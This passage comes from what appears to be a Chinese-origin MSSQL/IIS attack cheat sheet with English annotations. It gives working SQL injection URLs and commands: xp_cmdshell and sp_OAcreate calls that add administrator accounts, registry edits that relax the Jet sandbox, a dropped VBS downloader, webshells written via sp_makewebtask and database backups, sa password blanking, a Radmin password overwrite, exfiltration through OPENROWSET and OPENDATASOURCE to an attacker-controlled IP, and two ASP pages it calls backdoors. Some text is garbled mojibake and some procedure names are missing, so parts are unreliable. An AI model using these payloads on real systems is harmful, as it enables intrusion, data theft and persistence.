23. Turn off NTLM-only authentication on the Telnet service so a plain password logon works (`tlntadmn config sec = -ntlm`; this weakens the host and is a configuration change worth alerting on):
;exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'
24. Drop a file downloader iget.vbs with echo (Microsoft.XMLHTTP + ADODB.Stream; usage: `cscript iget.vbs <url> <localfile>`):
(1)echo Set x= createObject(^"Microsoft.XMLHTTP^"):x.Open ^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s = createObject(^"ADODB.Stream^"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >c:\iget.vbs
(2)c:\>cscript iget.vbs http://127.0.0.1/asp/dbm6.asp dbm6.asp
25. Creating an IIS virtual directory by hand:
? List the existing ones: cscript.exe c:\inetpub\AdminScripts\adsutil.vbs enum w3svc/1/root
? Create a folder: mkdir c:\asp\kiss
? Register it as the virtual directory kiss: cscript.exe c:\inetpub\AdminScripts\mkwebdir.vbs -c MyComputer -w "Default Web Site" -v "kiss","c:\asp\kiss"
? Grant execute and write on it (write plus execute on one directory is exactly the combination that lets a shell be uploaded and run — never configure it outside a lab):
cscript.exe c:\inetpub\AdminScripts\adsutil.vbs set w3svc/1/root/kiss/kiss/accesswrite "true" -s:
cscript.exe c:\inetpub\AdminScripts\adsutil.vbs set w3svc/1/root/kiss/accessexecute "true" -s:
? Optional — `createprocessasuser false` makes CGI children run in the IIS process context rather than as the requesting user: Cscript c:\inetpub\AdminScripts\adsutil.vbs set /w3svc/1/root/kiss/createprocessasuser false
? Test: http://127.0.0.1/kiss/test.asp
26. Querying through OPENROWSET with explicit sa credentials (SQLOLEDB provider; the password travels inside the query text and shows up in traces and logs):
select a.*
FROM OPENROWSET('SQLOLEDB','127.0.0.1';'sa';'111111',
'select * FROM ..') AS a
select * FROM OPENROWSET('SQLOLEDB','127.0.0.1';'sa';'111111',
'select * FROM ..')
27. Server name (same conversion-error trick):
http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,@@servername)--
select convert(int,@@servername)
select @@servername
28. Current login / database user:
http://www.XXXX.com/FullStory.asp?id=1 and 1=convert(int,system_user)--
http://www.19cn.com/showdetail.asp?id=49 and user>0
select user
29. Getting a webshell through cab archives (xp_makecab / xp_unpackcab):
? Pack a file into a cab:
EXEC master..xp_makecab 'c:\test.rar','default',1,'d:\cmd.asp'   (procedure name lost in encoding; the arguments match xp_makecab as listed in item 31)
? Unpack it into the web directory to get the webshell:
EXEC master..xp_unpackcab 'C:\test.rar','c:',1,'n.asp'   (likewise xp_unpackcab)
? Read a file's contents (needs rights in master):
EXEC .. 1,'c:\cmd.asp'   (procedure name lost in encoding)
30. With sa rights and a known web root, back the database up straight into the web root and fetch it over HTTP:
http://www.XXXX.com/FullStory.asp?id=1;backup database <database_name> to disk='c:\inetpub\wwwroot\save.db'   (the original reads `backuup`, a typo) — the whole database lands in the web root as a downloadable file, so the web root must be known first; the file is readable by anyone who guesses its name.
? Enumerating the file system to locate the web root — start with a scratch table:
http://www.XXXX.com/FullStory.asp?id=1;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
? xp_availablemedia lists the drives; store them in temp:
http://www.XXXX.com/FullStory.asp?id=1;insert temp exec master.dbo.xp_availablemedia;--
? Using what temp now holds, xp_subdirs lists a directory's subdirectories; store them in temp:
http://www.XXXX.com/FullStory.asp?id=1;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';--
? Or use xp_dirtree for the whole tree under a path:
http://www.XXXX.com/FullStory.asp?id=1;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- — lists every directory and folder in one go
? To see a file's contents, run `type` through xp_cmdshell: ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';--
? BULK INSERT loads a text file into a table one line per row, e.g. `bulk insert temp(id) from 'c:\inetpub\wwwroot\index.asp'`; reading the ASP source this way yields connection strings, system and web details, and frequently the sa password (keep database credentials out of web-readable files).
31. Summary of useful extended stored procedures (all live in master; apart from xp_dirtree/xp_subdirs on SQL 2000 they are granted to sysadmin only):
xp_availablemedia — drives available on the system, e.g. 'C:\' — xp_availablemedia
xp_enumgroups — local groups and their descriptions — xp_enumgroups
xp_enumdsn — ODBC system DSNs configured on the host — xp_enumdsn
xp_dirtree — directory and file tree under a path — xp_dirtree 'C:\inetpub\wwwroot\'
xp_getfiledetails — attributes of one file — xp_getfiledetails 'C:\inetpub\wwwroot.asp'
xp_makecab — compress files into a cab (the files follow the cab path, compression type and verbosity, comma-separated); the `dbp.` in the original is a typo for `dbo.` — dbo.xp_makecab 'C:\lin.cab','evil',1,'C:\inetpub\mdb.asp'
xp_unpackcab — extract a cab — xp_unpackcab 'C:\hackway.cab','C:\temp',1
xp_ntsec_enumdomains — enumerate domains — xp_ntsec_enumdomains
xp_servicecontrol — stop or start a service — xp_servicecontrol 'stop','schedule'
xp_terminate_process — kill a running process by pid — xp_terminate_process 123
dbo.xp_subdirs — immediate subdirectories of a path only — dbo.xp_subdirs 'C:\'
32. Helper: a generalised sp_MSforeachtable that iterates any object type (must be created in master, so sysadmin):
USE MASTER
GO
-- sp_MSforeachObject: a generalisation of the undocumented system helper
-- sp_MSforeachtable.  Runs @command1..@command3 once per object of the chosen
-- @objectType in the *current* database, replacing @replacechar in each command
-- with the bracket-quoted [owner].[object] name.
-- Created in master with the sp_ prefix so it resolves from any database
-- (creating it there needs sysadmin).  It relies on the system worker
-- sp_MSforeach_worker and the global cursor name hCForEach, exactly like
-- Microsoft's own helper.
-- SECURITY: @whereand, @precommand and @postcommand are spliced into dynamic
-- SQL verbatim and run with the caller's rights -- never build them from
-- untrusted input.
create proc sp_MSforeachObject
@objectType int=1,                   -- 1 table, 2 view, 3 trigger, 4 procedure ... 12 rule (see CASE below)
@command1 nvarchar(2000),            -- command template; @replacechar stands for [owner].[object]
@replacechar nchar(1) = N'?',
@command2 nvarchar(2000) = null,     -- optional second and third command per object
@command3 nvarchar(2000) = null,
@whereand nvarchar(2000) = null,     -- extra predicate text appended to the object query
@precommand nvarchar(2000) = null,   -- run once before the loop
@postcommand nvarchar(2000) = null   -- run once after the loop, only if nothing failed
as
/* This proc returns one or more rows for each object (optionally, matching @whereand), with each object defaulting to its
own result set */
/* @precommand and @postcommand may be used to force a single result set via a temp table. */
/* Preprocessor won't replace within quotes so have to use str(). */
declare @mscat nvarchar(12)
-- category bit 0x0002 marks Microsoft-shipped objects; they are excluded below
select @mscat = ltrim(str(convert(int, 0x0002)))
if (@precommand is not null)
exec(@precommand)
/* Defined @isobject for save object type */
-- Map @objectType to the OBJECTPROPERTY name used to filter sysobjects; an
-- unknown value leaves @isobject NULL and the cursor then selects nothing.
Declare @isobject varchar(256)
select @isobject= case @objectType when 1 then 'IsUserTable'
when 2 then 'IsView'
when 3 then 'IsTrigger'
when 4 then 'IsProcedure'
when 5 then 'IsDefault'
when 6 then 'IsForeignKey'
when 7 then 'IsScalarFunction'
when 8 then 'IsInlineFunction'
when 9 then 'IsPrimaryKey'
when 10 then 'IsExtendedProc'
when 11 then 'IsReplProc'
when 12 then 'IsRule'
end
/* create the select */
/* Use @isobject variable instead of IsUserTable string */
-- Declare the global cursor the worker iterates.  Names are bracket-quoted
-- with ']' doubled so unusual identifiers survive the dynamic SQL.
-- NOTE(review): @whereand defaults to NULL yet is concatenated here; this
-- mirrors Microsoft's sp_MSforeachtable, which relies on EXEC() treating a
-- NULL string argument as empty -- confirm on the target version.
EXEC(N'declare hCForEach cursor global for select ''['' + REPLACE(user_name(uid), N'']'', N'']]'') + '']'' + ''.'' + ''['' +
REPLACE(object_name(id), N'']'', N'']]'') + '']'' from dbo.sysobjects o '
+ N' where OBJECTPROPERTY(o.id, N'''+@isobject+''') = 1 '+N' and o.category & ' + @mscat + N' = 0 '
+ @whereand)
declare @retval int
select @retval = @@error
if (@retval = 0)
-- the worker fetches hCForEach, substitutes @replacechar and EXECs each command
exec @retval = sp_MSforeach_worker @command1, @replacechar, @command2, @command3
if (@retval = 0 and @postcommand is not null)
exec(@postcommand)
return @retval
GO
/*
Examples.  The double-quoted command strings require SET QUOTED_IDENTIFIER OFF;
with the (default) ON setting write them as '...' with inner quotes doubled.
1. Script out every stored procedure in the current database:
EXEc sp_MSforeachObject @command1="sp_helptext '?' ",@objectType=4
2. Script out every view:
EXEc sp_MSforeachObject @command1="sp_helptext '?' ",@objectType=2
3. Transfer ownership of all tables, views, triggers and procedures to dbo
   (sp_changeobjectowner is irreversible in bulk -- run with @objectType=1 first and check the output):
EXEc sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=1
EXEc sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=2
EXEc sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=3
EXEc sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=4
*/
33. Copying data out with only DB_OWNER rights (exfiltration via OPENROWSET to a server you control):
OPENROWSET does it. On your own SQL Server create a table with the same columns as the target table (all nvarchar), then run the statement below from Query Analyzer to pull the victim's table into yours. The victim instance must be able to open an outbound TCP 1433 connection to your host and must have ad hoc distributed queries enabled — egress filtering on the database tier defeats this:
insert into OPENROWSET ('sqloledb','server=ݿIP;uid=user;pwd=pass;database=dbname; ','select * from 㽨ı) select * from Էı
To limit the volume add a predicate, e.g. `select * from <table> where id>100`.
Done.
If the web server and SQL Server are the same machine, just BACKUP the database into the web root and download it — but not for large databases: a 2 GB backup times out the injected request.
With sa rights, back up from an ASP page instead (SQL-DMO; the two pages below embed or accept sa credentials and write files anywhere the service account can, so they are backdoors in their own right):
sqlbackup1.asp
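<HTML>
<HEAD>
<TITLE>SQL Server ݿıָ</TITLE>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</HEAD>
<BODY>
<form method="post" name=myform>
ѡ<INPUT TYPE="radio" NAME="act" id="act_backup" value="backup"><label for=act_backup></label>
<INPUT TYPE="radio" NAME="act" id="act_restore" value="restore"><label for=act_restore>ָ</label>
<br>ݿ<INPUT TYPE="text" NAME="databasename" value="<%=Server.HTMLEncode(request("databasename"))%>">
<br>ļ·<INPUT TYPE="text" NAME="bak_file" value="c:\1.exe">(ݻָļ·,ݳEXEҪΪ˷,..)<br>
<input type="submit" value="ȷ">
</form>
<%
' SQL-DMO backup / restore page.
' It connects to the local instance as sa with the password hard-coded below,
' so anyone who can fetch this page can back up or overwrite any database and
' write a .bak to any path the service account can reach.  Keep it out of
' production web roots.
' Changes from the original: the reflected databasename is HTML-encoded
' (stored/reflected XSS), Err checks now run under On Error Resume Next
' (without it they were dead code: a failed Connect aborted the page first),
' the restore result is checked after SQLRestore rather than before it, and
' "success" is no longer printed after an error.
On Error Resume Next
Err.Clear
dim sqlserver,sqlname,sqlpassword,sqlLoginTimeout,databasename,bak_file,act
sqlserver = "localhost" 'SQL Server host
sqlname = "sa" 'login
sqlpassword = "ݿ" 'password (hard-coded -- anyone reading this file has sa)
sqlLoginTimeout = 15 'login timeout in seconds
databasename = trim(request("databasename"))
bak_file = trim(request("bak_file"))
bak_file = replace(bak_file,"$1",databasename)
act = lcase(request("act"))
if databasename = "" then
response.write "input database name"
else
if act = "backup" then
Set srv=Server.createObject("SQLDMO.SQLServer")
srv.LoginTimeout = sqlLoginTimeout
srv.Connect sqlserver,sqlname, sqlpassword
Set bak = Server.createObject("SQLDMO.Backup")
bak.Database=databasename
' NOTE(review): Files is never declared on this page (it is the SQLDMO
' SQLDMODevice_Files constant in typed hosts); under VBScript it is Empty --
' confirm the Devices assignment has any effect.
bak.Devices=Files
bak.Files=bak_file
bak.SQLBackup srv
if err.number>0 then
response.write err.number&"<font color=red><br>"
response.write err.description&"</font>"
else
Response.write "<font color=green>ݳɹ!</font>"
end if
Set bak = Nothing
Set srv = Nothing
elseif act = "restore" then
' a restore needs the database to be free of other users at the time
Set srv=Server.createObject("SQLDMO.SQLServer")
srv.LoginTimeout = sqlLoginTimeout
srv.Connect sqlserver,sqlname, sqlpassword
Set rest=Server.createObject("SQLDMO.Restore")
rest.Action=0 ' full db restore
rest.Database=databasename
rest.Devices=Files
rest.Files=bak_file
rest.ReplaceDatabase=True 'Force restore over existing database
rest.SQLRestore srv
' Err is inspected after the restore; the original tested it before the
' call, so a failed restore still reported success.
if err.number>0 then
response.write err.number&"<font color=red><br>"
response.write err.description&"</font>"
else
Response.write "<font color=green>ָɹ!</font>"
end if
Set rest = Nothing
Set srv = Nothing
else
Response.write "<font color=red>ûѡ</font>"
end if
end if
%>
</BODY>
</HTML>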
sqlbackup2.asp
<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>ɷASPMSSQLݿ V1.0--QQ:79998575</title>
</head>
<style>
BODY { FONT-SIZE: 9pt; COLOR: #000000; FONT-FAMILY: "Courier New"; scrollbar-face-color:#E4E4F3; scrollbar-highlight-color:#FFFFFF; scrollbar-3dlight-color:#E4E4F3; scrollbar-darkshadow-color:#9C9CD3; scrollbar-shadow-color:#E4E4F3; scrollbar-arrow-color:#4444B3; scrollbar-track-color:#EFEFEF;}TABLE { FONT-SIZE: 9pt; FONT-FAMILY: "Courier New"; BORDER-COLLAPSE: collapse; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: none; border-bottom-style: none; border-left-style: solid; border-top-color: #d8d8f0; border-right-color: #d8d8f0; border-bottom-color: #d8d8f0; border-left-color: #d8d8f0;}.tr { font-family: "Courier New"; font-size: 9pt; background-color: #e4e4f3; text-align: center;}.td { font-family: "Courier New"; font-size: 9pt; background-color: #f9f9fd;}.warningColor { font-family: "Courier New"; font-size: 9pt; color: #ff0000;}input {
font-family: "Courier New";
BORDER-TOP-WIDTH: 1px;
BORDER-LEFT-WIDTH: 1px;
FONT-SIZE: 12px;
BORDER-BOTTOM-WIDTH: 1px;
BORDER-RIGHT-WIDTH: 1px;
color: #000000;
}textarea { font-family: "Courier New"; BORDER-TOP-WIDTH: 1px; BORDER-LEFT-WIDTH: 1px; FONT-SIZE: 12px; BORDER-BOTTOM-WIDTH: 1px; BORDER-RIGHT-WIDTH: 1px; color: #000000;}.liuyes {
background-color: #CCCCFF;
}
A:link { FONT-SIZE: 9pt; COLOR: #000000; FONT-FAMILY: "Courier New"; TEXT-DECORATION: none;}tr { font-family: "Courier New"; font-size: 9pt; line-height: 18px;}td { font-family: "Courier New"; font-size: 9pt; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: none; border-right-style: solid; border-bottom-style: solid; border-left-style: none; border-top-color: #d8d8f0; border-right-color: #d8d8f0; border-bottom-color: #d8d8f0; border-left-color: #d8d8f0;}.trHead { font-family: "Courier New"; font-size: 9pt; background-color: #e4e4f3; line-height: 3px;}.inputLogin { font-family: "Courier New"; font-size: 9pt; border: 1px solid #d8d8f0; background-color: #f9f9fd; vertical-align: bottom;}</style>
<body>
<form method="post" name="myform" action="?action=backupdatabase">
<table width="686" border="1" align="center">
<tr>
<td width="613" height="30" align="center" bgcolor="#330066"><font color="#FFFFFF">ɷASPMSSQLݿ V1.0 </font></td>
</tr>
<tr>
<td>ѡ
<input type="radio" name="act" id="act_backup"value="backup" />
<label for=act_backup></label>
<input type="radio" name="act" id="act_restore" value="restore" />
<label for=act_restore>ָ</label></td>
</tr>
<tr>
<td><label>SQL:
<input type="text" name="sqlserver" value="localhost" />
</label></td>
</tr>
<tr>
<td><label>û:
<input name="sqlname" type="text" value="sa" />
:
<input type="text" name="sqlpassword" />
</label></td>
</tr>
<tr>
<td><label>ݿ
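<%' the submitted name is reflected into the form; encode it so a crafted link cannot inject markup (reflected XSS) %>
<input type="text" name="databasename" value="<%=Server.HTMLEncode(request("databasename"))%>" />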
</label></td>
</tr>
<tr>
<td>ļ·
<input name="bak_file" type="text" value="<% =server.MapPath("\")&"\"&"liuyes.bak"%>" size="60" />
(ݻָļ·)</td>
</tr>
<tr>
<td><% Response.write "ļ·:" %>
<font color="#FF0000">
<% =server.mappath(Request.ServerVariables("SCRIPT_NAME")) %>
</font></td>
</tr>
<tr>
<td><input name=submit1 type="submit" class="liuyes" id=submit1 size="10" value="ȷ " />
<input name="Submit" type="reset" class="liuyes" size="10" value=" " /></td>
</tr>
</table>
</form>
<table width="686" border="1" align="center">
<tr>
<td>ʾϢ:<%
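if request("action")="" then
response.write "<font color=#ff0000>Ҷ˵ʲô˰ɣ</font>"
end if
'SQL Server backup / restore through SQL-DMO.
'The page takes the SQL login, password, database and backup path from the
'request, so whoever can reach it can back up or overwrite any database that
'login may touch and write a file anywhere the service account can.
'Changes from the original: the credentials are read from the POST body only
'(Request.Form) so they never travel in the query string and into the IIS
'logs; Err checks run under On Error Resume Next (without it a failed
'Connect aborted the page before any check); the restore result is checked
'after SQLRestore instead of before it; "success" is not printed after an
'error; SQL-DMO objects are released.
if request("action")="backupdatabase" Then
On Error Resume Next
Err.Clear
dim sqlserver,sqlname,sqlpassword,sqlLoginTimeout,databasename,bak_file,act
sqlserver = trim(Request.Form("sqlserver"))
sqlname = trim(Request.Form("sqlname"))
sqlpassword =trim(Request.Form("sqlpassword"))
sqlLoginTimeout = 15
databasename = trim(request("databasename"))
bak_file = trim(request("bak_file"))
bak_file = replace(bak_file,"$1",databasename)
act = lcase(request("act"))
if databasename = "" then
response.write "<font color=#ff0000>ûݿ!</font>"
else
if act = "backup" then
Set srv=Server.createObject("SQLDMO.SQLServer")
srv.LoginTimeout = sqlLoginTimeout
srv.Connect sqlserver,sqlname, sqlpassword
Set bak = Server.createObject("SQLDMO.Backup")
bak.Database=databasename
'NOTE(review): Files is never declared on this page (it is the SQLDMO
'SQLDMODevice_Files constant in typed hosts); under VBScript it evaluates
'to Empty -- confirm the Devices assignment has any effect.
bak.Devices=Files
bak.Action = 0 'full database backup (cf. rest.Action below)
bak.Initialize = 1 'initialise (overwrite) the backup media
'bak.Replace = True
bak.Files=bak_file
bak.SQLBackup srv
if err.number>0 then
response.write err.number&"<font color=red><br>"
response.write err.description&"</font>"
else
Response.write "<font color=green>ݳɹ!</font>"
end if
Set bak = Nothing
Set srv = Nothing
elseif act="restore" then
'a restore needs the database to be free of other users at the time
Set srv=Server.createObject("SQLDMO.SQLServer")
srv.LoginTimeout = sqlLoginTimeout
srv.Connect sqlserver,sqlname, sqlpassword
Set rest=Server.createObject("SQLDMO.Restore")
rest.Action=0 ' full db restore
rest.Database=databasename
rest.Devices=Files
rest.Files=bak_file
rest.ReplaceDatabase=True 'Force restore over existing database
rest.SQLRestore srv
'Err is inspected after the restore; the original tested it before the
'call, so a failed restore still reported success.
if err.number>0 then
response.write err.number&"<font color=red><br>"
response.write err.description&"</font>"
else
Response.write "<font color=green>ָɹ!</font>"
end if
Set rest = Nothing
Set srv = Nothing
else
Response.write "<font color=red>ѡݻָ!</font>"
end if
end if
end if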
%></td>
</tr>
</table>
</body>
</html>
(2) Privilege checks
// which database role do we hold (error-based variants use the char(124) pipes to frame the value in the error text)
and 1=(Select IS_MEMBER('db_owner'))
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
// can we access a given database (here master)
and 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
and char(124)%2Buser%2Bchar(124)=0
String-context variants of the same check (user name framed in pipes):
' and char(124)%2Buser%2Bchar(124)=0 and ''='
' and char(124)%2Buser%2Bchar(124)=0 and '%'='
Current user name (user>0 forces a conversion error that echoes it):
and user>0
' and user>0 and ''='
Is the login sysadmin? (the hex form spells 'sysadmin' in UTF-16 to dodge quote filtering)
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
Is it SQL Server at all? (sysobjects exists only there)
and exists (select * from sysobjects);--
Does the injection point accept stacked statements? (a harmless DECLARE that fails loudly on drivers/engines without batch support)
;declare @d int;--
Re-register xp_cmdshell (a bare DLL name resolves in the instance's Binn directory; sysadmin required):
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
//-----------------------
// command execution
//-----------------------
First relax the Jet sandbox (SandBoxMode=1 lets non-Access callers run shell(); sysadmin, via xp_regwrite):
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
Then run a command through the Jet OLE DB provider (ad hoc OPENROWSET; the .mdb must exist):
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
Run a command through WScript.Shell (OLE Automation procedures):
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
EXEC .. 'cmd /c md c:\1111'   (procedure name lost in encoding)
Check whether xp_cmdshell is registered:
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
Write the registry (xp_regwrite; same Jet sandbox key as above):
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
(use REG_SZ for string values)
Read the registry (Winlogon\Userinit is also a common persistence location worth checking on a compromised host):
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
List a directory (xp_dirtree path, depth, include-files):
exec master..xp_dirtree 'c:\winnt\system32\',1,1
Back up a database to a file:
backup database pubs to disk = 'c:\123.bak'
// Count the rows of a table (here a scratch table named D99_Tmp), leaked through a conversion error:
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
Reset the sa password once connected with sysadmin rights. Note that this example sets it to the EMPTY string ('' is the new-password argument of sp_password):
exec sp_password NULL,'','sa'
Add a login 'test' and make it a member of sysadmin:
exec master.dbo.sp_addlogin test,9530772
exec master.dbo.sp_addsrvrolemember test,sysadmin
Drop the xp_cmdshell extended stored procedure:
exec sp_dropextendedproc 'xp_cmdshell'
Register a custom extended stored procedure from a DLL and grant execute on it to public (the database prefix before `..sp_addextendedproc` is missing in this copy; the other examples use master..):
EXEC ..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
GRANT exec On xp_proxiedadata TO public
Stop and start a Windows service (here 'schedule', the Task Scheduler):
exec master..xp_servicecontrol 'stop','schedule'
exec master..xp_servicecontrol 'start','schedule'
dbo.xp_subdirs
Lists only the immediate subdirectories of a directory.
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
dbo.xp_makecab
Packs the listed files into the target .cab archive.
Each additional file to compress is passed as another comma-separated argument:
dbo.xp_makecab
'c:\test.cab','mszip',1,
'C:\Inetpub\wwwroot\SQLInject\login.asp',
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
xp_terminate_process
Kills a running process by its Process ID.
Task Manager (View → Select Columns → PID) shows the ID of every running process.
xp_terminate_process 2484
xp_unpackcab
Extract a .cab archive into a directory:
xp_unpackcab 'c:\test.cab','c:\temp',1
Example: Radmin was installed on the target but its password was unknown; regedit.exe had been deleted and net.exe was missing, so `regedit /e` could not be used to export the registry. With MSSQL running with sa rights, the stored Radmin password can be overwritten instead: EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c (the page gives this as the hash of 12345678). To change the listening port: EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 (0x04d2 little-endian = port 1234).
-- Scratch database and tables on the attacker-side SQL Server that the OPENDATASOURCE
-- exfiltration below points at: ku receives the database names; biao is not used by the
-- example that follows (presumably meant for table names).
create database lcx;
Create TABLE ku(name nvarchar(256) null);
Create TABLE biao(id int NULL,name nvarchar(256) null);
// Exfiltrate the list of databases to an attacker-controlled SQL Server through OPENDATASOURCE (target server, login and password are in the connection string; on 2005+ this needs 'Ad Hoc Distributed Queries' enabled, see the sp_configure examples near the end):
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
// Test for write permission in master:
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
Use sp_makewebtask to write a one-line webshell (`<%execute(request("a"))%>`, URL-encoded in the example) straight into the web directory:
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
// Update a row:
Update films SET kind = 'Dramatic' Where id = 123
// Delete a row:
delete from table_name where Stockid = 3
Manual injection walkthrough:
1. Test whether the parameter is injectable: ;and 1=1 versus ;and 1=2 (a different response means the condition is being evaluated)
2. Check for MSSQL: ;and user>0 (the conversion error reveals the user name)
3. String-type injection point: 'and [query] and ''='
4. When the parameter lands inside a LIKE search: 'and [query] and '%25'=' (%25 is a URL-encoded %)
5. Identify the database system:
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access
6. Guess a table name: ;and (select Count(*) from [table])>0
7. Guess a column name: ;and (select Count(column) from table)>0
8. Find the length of a column value: ;and (select top 1 len(column) from table)>0 (then narrow the bound)
9.(1) Recover the ASCII value of one character of a column value (Access):
;and (select top 1 asc(mid(ֶ,1,1)) from ݿ)>0
(2) The same for MSSQL:
;and (select top 1 unicode(substring(ֶ,1,1)) from ݿ)>0
10. Privilege enumeration (mssql):
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
;and 1=(select IS_MEMBER('db_owner'));--
11. Add an MSSQL login and an OS account. Note: sp_addsrvrolemember takes the login first, then the role, comma-separated — compare the `test,sysadmin` example earlier on this page; the `sysadmin username` form below has the arguments reversed:
;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,username,password;--
;exec master.dbo.sp_addsrvrolemember sysadmin username;--
;exec master.dbo.xp_cmdshell 'net user username password
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';--
;exec master.dbo.xp_cmdshell 'net user username password /add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--
12.(1) Enumerate directories through a scratch table (the last line presumably should end in `>0` like the one before it, with the `not in(...)` list holding the paths already recovered):
;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree 'c:\'
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not in('ϲõpaths'))>)
(2) Drive, directory and file listing through a scratch table:
-- Directory/file enumeration through a scratch table: each extended procedure's result set
-- is captured with INSERT ... EXEC and read back afterwards (e.g. with the
-- "and (select top 1 ... from temp)>0" style probe used in 12.(1) above).
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- list the available drives
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- immediate subdirectories of c:\
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- directory tree of c:\
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- dump a file's contents (needs xp_cmdshell)
13. Registry-related extended stored procedures in MSSQL:
xp_regenumvalues root_key, subkey
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -- enumerate every value under the autostart Run key
xp_regread root_key, subkey, value_name
;exec xp_regread
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' -- read one named value
xp_regwrite root_key, subkey, value_name, value_type, value
value_type: REG_SZ for a string, REG_DWORD for a number
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' -- write a REG_SZ value
xp_regdeletevalue root_key, subkey, value_name
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' -- delete one value
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' -- delete a key together with all values under it
14. Drop a webshell via BACKUP DATABASE (note that the inserted literal is empty in this copy — the shell body has been lost):
-- Webshell via BACKUP DATABASE: put the shell text in a table of the 'model' database and
-- back the database up to an attacker-chosen path (here c:\l.asp). The inserted literal is
-- EMPTY in this copy, i.e. the shell body was lost; expect the output file to carry
-- backup-format bytes around the payload as well.
use model
create table cmd(str image);
insert into cmd(str) values ('');
backup database model to disk='c:\l.asp';
15. Useful MSSQL functions (each value leaks through a conversion error):
